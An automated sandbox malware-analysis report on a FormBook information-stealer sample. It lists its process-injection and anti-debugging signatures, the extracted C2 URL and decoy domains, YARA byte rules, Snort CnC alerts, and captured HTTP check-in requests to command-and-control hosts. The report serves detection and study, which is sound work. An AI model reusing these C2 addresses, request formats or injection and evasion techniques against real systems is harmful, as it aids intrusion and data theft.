Joe Sandbox Cloud Basic Analysis Report

Loading ...

Play interactive tourEdit tour

Analysis Report NdBLyH2h5d.exe

Overview

General Information

Sample Name:NdBLyH2h5d.exe
Analysis ID:385309
MD5:3fef6985af0d52ab6701df170096b504
SHA1:ac8db3220c960262f8e666eae676066cec541b3a
SHA256:a9c3d37d324e9b6a0ebf9f9369c68cc288117edc4657d086b0fbc0cbafee9e64
Tags:exe
Infos:

Most interesting Screenshot:

Detection

FormBook
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus detection for URL or domain
Detected unpacking (changes PE section rights)
Found malware configuration
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for submitted file
Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)
System process connects to network (likely due to code injection or exploit)
Yara detected FormBook
C2 URLs / IPs found in malware configuration
Contains functionality to prevent local Windows debugging
Maps a DLL or memory area into another process
Modifies the context of a thread in another process (thread injection)
Queues an APC in another process (thread injection)
Sample uses process hollowing technique
Tries to detect virtualization through RDTSC time measurements
Antivirus or Machine Learning detection for unpacked file
Checks if the current process is being debugged
Contains capabilities to detect virtual machines
Contains functionality for execution timing, often used to detect debuggers
Contains functionality for read data from the clipboard
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality to call native functions
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to dynamically determine API calls
Contains functionality to read the PEB
Contains functionality to shutdown / reboot the system
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Drops PE files
Enables debug privileges
Found inlined nop instructions (likely shell or obfuscated code)
Found potential string decryption / allocating functions
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
PE file contains sections with non-standard names
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Uses 32bit PE files
Uses code obfuscation techniques (call, push, ret)
Yara signature match

Classification

Startup

  • System is w10x64
  • NdBLyH2h5d.exe (PID: 5612 cmdline: 'C:\Users\user\Desktop\NdBLyH2h5d.exe' MD5: 3FEF6985AF0D52AB6701DF170096B504)
    • NdBLyH2h5d.exe (PID: 6140 cmdline: 'C:\Users\user\Desktop\NdBLyH2h5d.exe' MD5: 3FEF6985AF0D52AB6701DF170096B504)
      • explorer.exe (PID: 3388 cmdline: MD5: AD5296B280E8F522A8A897C96BAB0E1D)
        • rundll32.exe (PID: 6048 cmdline: C:\Windows\SysWOW64\rundll32.exe MD5: D7CA562B0DB4F4DD0F03A89A1FDAD63D)
          • cmd.exe (PID: 4228 cmdline: /c del 'C:\Users\user\Desktop\NdBLyH2h5d.exe' MD5: F3BDBE3BB6F734E357235F4D5898582D)
            • conhost.exe (PID: 5988 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
  • cleanup

Malware Configuration

Threatname: FormBook

{"C2 list": ["www.montcoimmigrationlawyer.com/uoe8/"], "decoy": ["chalance.design", "certifiedlaywernj.com", "bsbgraphic.com", "caeka.com", "zagorafinancial.com", "cvingenieriacivil.net", "mojilifenoosa.com", "bucktheherd.net", "sparkmonic.com", "catherineandwilson.com", "cdefenders.com", "intersp.net", "santoriniimpressivetours.net", "arkansaspaymentrelief.com", "tewab.com", "bjzjgjg.com", "michgoliki.com", "oallahplease.com", "plaisterpress.com", "redyroblx.com", "funnyfootballmugs.com", "borderlesstrade.info", "partequity.net", "3992199.com", "bestcoloncleanseblog.com", "online-legalservices.com", "fibermover.com", "magen-tracks.xyz", "hotelsinshirdimkm.com", "beachjunction.com", "lanren.plus", "nouvellecartebancaire.com", "thegiftsofdepression.com", "metabol.parts", "dvxdkrbll.icu", "flsprayer.com", "przyczepy.net", "cantinhosdeaparecida.com", "californiasecuritycamera.com", "nevadasmallbusinessattorney.com", "skipperdaily.com", "missjeschickt.com", "rocketmortgageshady.net", "upholsteredwineracks.com", "best20singles.com", "fsquanyi.com", "ronlinebiz.com", "gaelmobilecarwash.com", "commercials.pro", "bl927.com", "workforceuae.com", "innercritictypes.com", "unipacksexpress.com", "chaitanya99.com", "rangamaty.com", "7chd.com", "keydefi.com", "liveporn.wiki", "carajedellcasting.com", "gooddoggymedia.com", "boldercoolware.com", "hispekdiamond.com", "expnashvilletn.com", "swashbug.com"]}

Yara Overview

Memory Dumps

SourceRuleDescriptionAuthorStrings
00000006.00000002.479447176.0000000002BA0000.00000040.00000001.sdmpJoeSecurity_FormBookYara detected FormBookJoe Security
    00000006.00000002.479447176.0000000002BA0000.00000040.00000001.sdmpFormbook_1autogenerated rule brought to you by yara-signatorFelix Bilstein - yara-signator at cocacoding dot com
    • 0x85e8:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
    • 0x8972:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
    • 0x14685:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
    • 0x14171:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
    • 0x14787:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
    • 0x148ff:$sequence_4: 5D C3 8D 50 7C 80 FA 07
    • 0x938a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
    • 0x133ec:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
    • 0xa102:$sequence_7: 66 89 0C 02 5B 8B E5 5D
    • 0x19777:$sequence_8: 3C 54 74 04 3C 74 75 F4
    • 0x1a81a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
    00000006.00000002.479447176.0000000002BA0000.00000040.00000001.sdmpFormbookdetect Formbook in memoryJPCERT/CC Incident Response Group
    • 0x166a9:$sqlite3step: 68 34 1C 7B E1
    • 0x167bc:$sqlite3step: 68 34 1C 7B E1
    • 0x166d8:$sqlite3text: 68 38 2A 90 C5
    • 0x167fd:$sqlite3text: 68 38 2A 90 C5
    • 0x166eb:$sqlite3blob: 68 53 D8 7F 8C
    • 0x16813:$sqlite3blob: 68 53 D8 7F 8C
    00000001.00000002.252981265.0000000000D10000.00000040.00000001.sdmpJoeSecurity_FormBookYara detected FormBookJoe Security
      00000001.00000002.252981265.0000000000D10000.00000040.00000001.sdmpFormbook_1autogenerated rule brought to you by yara-signatorFelix Bilstein - yara-signator at cocacoding dot com
      • 0x85e8:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
      • 0x8972:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
      • 0x14685:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
      • 0x14171:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
      • 0x14787:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
      • 0x148ff:$sequence_4: 5D C3 8D 50 7C 80 FA 07
      • 0x938a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
      • 0x133ec:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
      • 0xa102:$sequence_7: 66 89 0C 02 5B 8B E5 5D
      • 0x19777:$sequence_8: 3C 54 74 04 3C 74 75 F4
      • 0x1a81a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
      Click to see the 19 entries

      Unpacked PEs

      SourceRuleDescriptionAuthorStrings
      0.2.NdBLyH2h5d.exe.2640000.2.raw.unpackJoeSecurity_FormBookYara detected FormBookJoe Security
        0.2.NdBLyH2h5d.exe.2640000.2.raw.unpackFormbook_1autogenerated rule brought to you by yara-signatorFelix Bilstein - yara-signator at cocacoding dot com
        • 0x85e8:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
        • 0x8972:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
        • 0x14685:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
        • 0x14171:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
        • 0x14787:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
        • 0x148ff:$sequence_4: 5D C3 8D 50 7C 80 FA 07
        • 0x938a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
        • 0x133ec:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
        • 0xa102:$sequence_7: 66 89 0C 02 5B 8B E5 5D
        • 0x19777:$sequence_8: 3C 54 74 04 3C 74 75 F4
        • 0x1a81a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
        0.2.NdBLyH2h5d.exe.2640000.2.raw.unpackFormbookdetect Formbook in memoryJPCERT/CC Incident Response Group
        • 0x166a9:$sqlite3step: 68 34 1C 7B E1
        • 0x167bc:$sqlite3step: 68 34 1C 7B E1
        • 0x166d8:$sqlite3text: 68 38 2A 90 C5
        • 0x167fd:$sqlite3text: 68 38 2A 90 C5
        • 0x166eb:$sqlite3blob: 68 53 D8 7F 8C
        • 0x16813:$sqlite3blob: 68 53 D8 7F 8C
        1.2.NdBLyH2h5d.exe.400000.0.raw.unpackJoeSecurity_FormBookYara detected FormBookJoe Security
          1.2.NdBLyH2h5d.exe.400000.0.raw.unpackFormbook_1autogenerated rule brought to you by yara-signatorFelix Bilstein - yara-signator at cocacoding dot com
          • 0x85e8:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
          • 0x8972:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
          • 0x14685:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
          • 0x14171:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
          • 0x14787:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
          • 0x148ff:$sequence_4: 5D C3 8D 50 7C 80 FA 07
          • 0x938a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
          • 0x133ec:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
          • 0xa102:$sequence_7: 66 89 0C 02 5B 8B E5 5D
          • 0x19777:$sequence_8: 3C 54 74 04 3C 74 75 F4
          • 0x1a81a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
          Click to see the 13 entries

          Sigma Overview

          No Sigma rule has matched

          Signature Overview

          Click to jump to signature section

          Show All Signature Results

          AV Detection:

          barindex
          Antivirus detection for URL or domainShow sources
          Source: http://www.7chd.com/uoe8/?Dnh8=pp2ekQWroypTFKaJa5Qkcd1bUyGAkfDbiqxtSX5G9L70Cmz7PeGJVxgmdicR3ONQ4/wh&pPB=K2MxltkHBDK4hDMpAvira URL Cloud: Label: malware
          Found malware configurationShow sources
          Source: 00000006.00000002.479447176.0000000002BA0000.00000040.00000001.sdmpMalware Configuration Extractor: FormBook {"C2 list": ["www.montcoimmigrationlawyer.com/uoe8/"], "decoy": ["chalance.design", "certifiedlaywernj.com", "bsbgraphic.com", "caeka.com", "zagorafinancial.com", "cvingenieriacivil.net", "mojilifenoosa.com", "bucktheherd.net", "sparkmonic.com", "catherineandwilson.com", "cdefenders.com", "intersp.net", "santoriniimpressivetours.net", "arkansaspaymentrelief.com", "tewab.com", "bjzjgjg.com", "michgoliki.com", "oallahplease.com", "plaisterpress.com", "redyroblx.com", "funnyfootballmugs.com", "borderlesstrade.info", "partequity.net", "3992199.com", "bestcoloncleanseblog.com", "online-legalservices.com", "fibermover.com", "magen-tracks.xyz", "hotelsinshirdimkm.com", "beachjunction.com", "lanren.plus", "nouvellecartebancaire.com", "thegiftsofdepression.com", "metabol.parts", "dvxdkrbll.icu", "flsprayer.com", "przyczepy.net", "cantinhosdeaparecida.com", "californiasecuritycamera.com", "nevadasmallbusinessattorney.com", "skipperdaily.com", "missjeschickt.com", "rocketmortgageshady.net", "upholsteredwineracks.com", "best20singles.com", "fsquanyi.com", "ronlinebiz.com", "gaelmobilecarwash.com", "commercials.pro", "bl927.com", "workforceuae.com", "innercritictypes.com", "unipacksexpress.com", "chaitanya99.com", "rangamaty.com", "7chd.com", "keydefi.com", "liveporn.wiki", "carajedellcasting.com", "gooddoggymedia.com", "boldercoolware.com", "hispekdiamond.com", "expnashvilletn.com", "swashbug.com"]}
          Multi AV Scanner detection for submitted fileShow sources
          Source: NdBLyH2h5d.exeVirustotal: Detection: 20%Perma Link
          Source: NdBLyH2h5d.exeReversingLabs: Detection: 29%
          Yara detected FormBookShow sources
          Source: Yara matchFile source: 00000006.00000002.479447176.0000000002BA0000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000001.00000002.252981265.0000000000D10000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000001.00000001.216382055.0000000000400000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000006.00000002.479518416.0000000002BD0000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000006.00000002.477763536.00000000003B0000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000000.00000002.220737400.0000000002640000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000001.00000002.251780001.00000000009B0000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000001.00000002.250995157.0000000000400000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 0.2.NdBLyH2h5d.exe.2640000.2.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 1.2.NdBLyH2h5d.exe.400000.0.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 0.2.NdBLyH2h5d.exe.2640000.2.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 1.2.NdBLyH2h5d.exe.400000.0.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 1.1.NdBLyH2h5d.exe.400000.0.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 1.1.NdBLyH2h5d.exe.400000.0.raw.unpack, type: UNPACKEDPE
          Source: 6.2.rundll32.exe.4d44f8.2.unpackAvira: Label: TR/Patched.Ren.Gen
          Source: 0.2.NdBLyH2h5d.exe.2640000.2.unpackAvira: Label: TR/Crypt.ZPACK.Gen
          Source: 1.2.NdBLyH2h5d.exe.400000.0.unpackAvira: Label: TR/Crypt.ZPACK.Gen
          Source: 1.1.NdBLyH2h5d.exe.400000.0.unpackAvira: Label: TR/Crypt.ZPACK.Gen
          Source: 6.2.rundll32.exe.4b17960.5.unpackAvira: Label: TR/Patched.Ren.Gen
          Source: NdBLyH2h5d.exeStatic PE information: LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, RELOCS_STRIPPED
          Source: Binary string: wntdll.pdbUGP source: NdBLyH2h5d.exe, 00000000.00000003.216210756.000000001EFE0000.00000004.00000001.sdmp, NdBLyH2h5d.exe, 00000001.00000002.252496199.0000000000AFF000.00000040.00000001.sdmp, rundll32.exe, 00000006.00000002.481925699.00000000046FF000.00000040.00000001.sdmp
          Source: Binary string: wntdll.pdb source: NdBLyH2h5d.exe, rundll32.exe
          Source: Binary string: rundll32.pdb source: NdBLyH2h5d.exe, 00000001.00000002.253158543.0000000002640000.00000040.00000001.sdmp
          Source: Binary string: rundll32.pdbGCTL source: NdBLyH2h5d.exe, 00000001.00000002.253158543.0000000002640000.00000040.00000001.sdmp
          Source: C:\Users\user\Desktop\NdBLyH2h5d.exeCode function: 0_2_00405301 DeleteFileA,lstrcatA,lstrcatA,lstrlenA,FindFirstFileA,SetFileAttributesA,DeleteFileA,FindNextFileA,FindClose,SetFileAttributesA,RemoveDirectoryA,0_2_00405301
          Source: C:\Users\user\Desktop\NdBLyH2h5d.exeCode function: 0_2_00405C94 SetErrorMode,SetErrorMode,FindFirstFileA,SetErrorMode,FindClose,0_2_00405C94
          Source: C:\Users\user\Desktop\NdBLyH2h5d.exeCode function: 0_2_004026BC FindFirstFileA,0_2_004026BC
          Source: C:\Users\user\Desktop\NdBLyH2h5d.exeCode function: 4x nop then pop ebx1_2_00406A9C
          Source: C:\Users\user\Desktop\NdBLyH2h5d.exeCode function: 4x nop then pop edi1_2_0041563B
          Source: C:\Users\user\Desktop\NdBLyH2h5d.exeCode function: 4x nop then pop ebx1_1_00406A9C
          Source: C:\Users\user\Desktop\NdBLyH2h5d.exeCode function: 4x nop then pop edi1_1_0041563B
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4x nop then pop ebx6_2_02BA6A96
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4x nop then pop edi6_2_02BB563B

          Networking:

          barindex
          Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)Show sources
          Source: TrafficSnort IDS: 2031453 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.3:49713 -> 52.15.160.167:80
          Source: TrafficSnort IDS: 2031449 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.3:49713 -> 52.15.160.167:80
          Source: TrafficSnort IDS: 2031412 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.3:49713 -> 52.15.160.167:80
          Source: TrafficSnort IDS: 2031453 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.3:49718 -> 213.171.195.105:80
          Source: TrafficSnort IDS: 2031449 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.3:49718 -> 213.171.195.105:80
          Source: TrafficSnort IDS: 2031412 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.3:49718 -> 213.171.195.105:80
          Source: TrafficSnort IDS: 2031453 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.3:49725 -> 23.227.38.74:80
          Source: TrafficSnort IDS: 2031449 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.3:49725 -> 23.227.38.74:80
          Source: TrafficSnort IDS: 2031412 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.3:49725 -> 23.227.38.74:80
          Source: TrafficSnort IDS: 2031453 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.3:49733 -> 184.168.131.241:80
          Source: TrafficSnort IDS: 2031449 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.3:49733 -> 184.168.131.241:80
          Source: TrafficSnort IDS: 2031412 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.3:49733 -> 184.168.131.241:80
          Source: TrafficSnort IDS: 2031453 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.3:49735 -> 104.21.24.135:80
          Source: TrafficSnort IDS: 2031449 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.3:49735 -> 104.21.24.135:80
          Source: TrafficSnort IDS: 2031412 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.3:49735 -> 104.21.24.135:80
          C2 URLs / IPs found in malware configurationShow sources
          Source: Malware configuration extractorURLs: www.montcoimmigrationlawyer.com/uoe8/
          Source: global trafficHTTP traffic detected: GET /uoe8/?Dnh8=6wr609Vx9lIYE8xJyDK49BerhrrLsGkNJqd9AfCiKUtPUCt4zBl+uaOpo8ym8tjcWxTe&pPB=K2MxltkHBDK4hDMp HTTP/1.1Host: www.fibermover.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /uoe8/?Dnh8=CVv7qMV6HbciCWFzqhUZZAQ0US+YdWqRbJ1eYpd5+PQQEEyRiYk8iw/aqhx7FohNRjRK&pPB=K2MxltkHBDK4hDMp HTTP/1.1Host: www.mojilifenoosa.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /uoe8/?Dnh8=pp2ekQWroypTFKaJa5Qkcd1bUyGAkfDbiqxtSX5G9L70Cmz7PeGJVxgmdicR3ONQ4/wh&pPB=K2MxltkHBDK4hDMp HTTP/1.1Host: www.7chd.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /uoe8/?Dnh8=UhlVi8jLiQUXpO3Mm3lJbnFIbsRb97T5i2flOgFV3YbeH0Xk3z/nbJUyPEwPPltkxnEn&pPB=K2MxltkHBDK4hDMp HTTP/1.1Host: www.hispekdiamond.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /uoe8/?Dnh8=jbWl/12JT1iDRb0v1vq5On9CelmHmR3hJr6gjt0xDgcmriA4IMeiSysiloI+majB4Luo&pPB=K2MxltkHBDK4hDMp HTTP/1.1Host: www.swashbug.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /uoe8/?Dnh8=0AgkmMdb/xcAtot8xloO7jEL6e2GWsoAGGF4g5velsS4rIzaA3O5+OYWQMQKg8Hr7C9A&pPB=K2MxltkHBDK4hDMp HTTP/1.1Host: www.zagorafinancial.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /uoe8/?Dnh8=oRF9sMnf9PdLhjUOIBAEDWVppNUvEE2O6ED6s7IbEJi5z3I9xavY20aFrDWDg7pV30V8&pPB=K2MxltkHBDK4hDMp HTTP/1.1Host: www.funnyfootballmugs.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /uoe8/?Dnh8=TYKQicIMvKRESm/flOMvKt3N/kbr0v+cwHo5PwIdzkllwLOIwmCeEw+gbEKOgk8UbATi&pPB=K2MxltkHBDK4hDMp HTTP/1.1Host: www.przyczepy.netConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /uoe8/?Dnh8=h2lbrHqA/lU/5ydhtyDssHwS0ovAY6emeVgF9WK6HhWxxVaP+H0Yfne8Qd/1EA4oYSoB&pPB=K2MxltkHBDK4hDMp HTTP/1.1Host: www.3992199.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /uoe8/?Dnh8=DVW7OxuTiipzhEotDzIJzGfsiMq3vXOqW3PM8kZWjghPJAmdu1p3BOMI8OM6bfwnU86n&pPB=K2MxltkHBDK4hDMp HTTP/1.1Host: www.montcoimmigrationlawyer.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /uoe8/?Dnh8=4x9Go+G4sQK1bPcn4vkzPWadXV0GNuVhhd/eQWnbDPmuQCX7Nztt7R8hTxXUs1RW0ALQ&pPB=K2MxltkHBDK4hDMp HTTP/1.1Host: www.missjeschickt.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /uoe8/?Dnh8=6wr609Vx9lIYE8xJyDK49BerhrrLsGkNJqd9AfCiKUtPUCt4zBl+uaOpo8ym8tjcWxTe&pPB=K2MxltkHBDK4hDMp HTTP/1.1Host: www.fibermover.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: Joe Sandbox ViewIP Address: 45.142.156.44 45.142.156.44
          Source: Joe Sandbox ViewIP Address: 23.227.38.74 23.227.38.74
          Source: Joe Sandbox ViewASN Name: CNSERVERSUS CNSERVERSUS
          Source: Joe Sandbox ViewASN Name: CLOUDFLARENETUS CLOUDFLARENETUS
          Source: Joe Sandbox ViewASN Name: AS-26496-GO-DADDY-COM-LLCUS AS-26496-GO-DADDY-COM-LLCUS
          Source: global trafficHTTP traffic detected: GET /uoe8/?Dnh8=6wr609Vx9lIYE8xJyDK49BerhrrLsGkNJqd9AfCiKUtPUCt4zBl+uaOpo8ym8tjcWxTe&pPB=K2MxltkHBDK4hDMp HTTP/1.1Host: www.fibermover.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /uoe8/?Dnh8=CVv7qMV6HbciCWFzqhUZZAQ0US+YdWqRbJ1eYpd5+PQQEEyRiYk8iw/aqhx7FohNRjRK&pPB=K2MxltkHBDK4hDMp HTTP/1.1Host: www.mojilifenoosa.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /uoe8/?Dnh8=pp2ekQWroypTFKaJa5Qkcd1bUyGAkfDbiqxtSX5G9L70Cmz7PeGJVxgmdicR3ONQ4/wh&pPB=K2MxltkHBDK4hDMp HTTP/1.1Host: www.7chd.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /uoe8/?Dnh8=UhlVi8jLiQUXpO3Mm3lJbnFIbsRb97T5i2flOgFV3YbeH0Xk3z/nbJUyPEwPPltkxnEn&pPB=K2MxltkHBDK4hDMp HTTP/1.1Host: www.hispekdiamond.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /uoe8/?Dnh8=jbWl/12JT1iDRb0v1vq5On9CelmHmR3hJr6gjt0xDgcmriA4IMeiSysiloI+majB4Luo&pPB=K2MxltkHBDK4hDMp HTTP/1.1Host: www.swashbug.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /uoe8/?Dnh8=0AgkmMdb/xcAtot8xloO7jEL6e2GWsoAGGF4g5velsS4rIzaA3O5+OYWQMQKg8Hr7C9A&pPB=K2MxltkHBDK4hDMp HTTP/1.1Host: www.zagorafinancial.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /uoe8/?Dnh8=oRF9sMnf9PdLhjUOIBAEDWVppNUvEE2O6ED6s7IbEJi5z3I9xavY20aFrDWDg7pV30V8&pPB=K2MxltkHBDK4hDMp HTTP/1.1Host: www.funnyfootballmugs.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /uoe8/?Dnh8=TYKQicIMvKRESm/flOMvKt3N/kbr0v+cwHo5PwIdzkllwLOIwmCeEw+gbEKOgk8UbATi&pPB=K2MxltkHBDK4hDMp HTTP/1.1Host: www.przyczepy.netConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /uoe8/?Dnh8=h2lbrHqA/lU/5ydhtyDssHwS0ovAY6emeVgF9WK6HhWxxVaP+H0Yfne8Qd/1EA4oYSoB&pPB=K2MxltkHBDK4hDMp HTTP/1.1Host: www.3992199.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /uoe8/?Dnh8=DVW7OxuTiipzhEotDzIJzGfsiMq3vXOqW3PM8kZWjghPJAmdu1p3BOMI8OM6bfwnU86n&pPB=K2MxltkHBDK4hDMp HTTP/1.1Host: www.montcoimmigrationlawyer.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /uoe8/?Dnh8=4x9Go+G4sQK1bPcn4vkzPWadXV0GNuVhhd/eQWnbDPmuQCX7Nztt7R8hTxXUs1RW0ALQ&pPB=K2MxltkHBDK4hDMp HTTP/1.1Host: www.missjeschickt.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /uoe8/?Dnh8=6wr609Vx9lIYE8xJyDK49BerhrrLsGkNJqd9AfCiKUtPUCt4zBl+uaOpo8ym8tjcWxTe&pPB=K2MxltkHBDK4hDMp HTTP/1.1Host: www.fibermover.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: unknownDNS traffic detected: queries for: www.fibermover.com
          Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Mon, 12 Apr 2021 08:06:24 GMTContent-Type: text/htmlContent-Length: 153Connection: closeServer: nginx/1.16.1Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 31 36 2e 31 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx/1.16.1</center></body></html>
          Source: explorer.exe, 00000004.00000000.237810152.000000000F675000.00000004.00000001.sdmpString found in binary or memory: http://crl.globalsign.net/root-r2.crl0
          Source: explorer.exe, 00000004.00000000.233791892.0000000008B46000.00000002.00000001.sdmpString found in binary or memory: http://fontfabrik.com
          Source: explorer.exe, 00000004.00000000.233791892.0000000008B46000.00000002.00000001.sdmpString found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0
          Source: explorer.exe, 00000004.00000000.233791892.0000000008B46000.00000002.00000001.sdmpString found in binary or memory: http://www.carterandcone.coml
          Source: explorer.exe, 00000004.00000000.233791892.0000000008B46000.00000002.00000001.sdmpString found in binary or memory: http://www.fontbureau.com
          Source: explorer.exe, 00000004.00000000.233791892.0000000008B46000.00000002.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designers
          Source: explorer.exe, 00000004.00000000.233791892.0000000008B46000.00000002.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designers/?
          Source: explorer.exe, 00000004.00000000.233791892.0000000008B46000.00000002.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designers/cabarga.htmlN
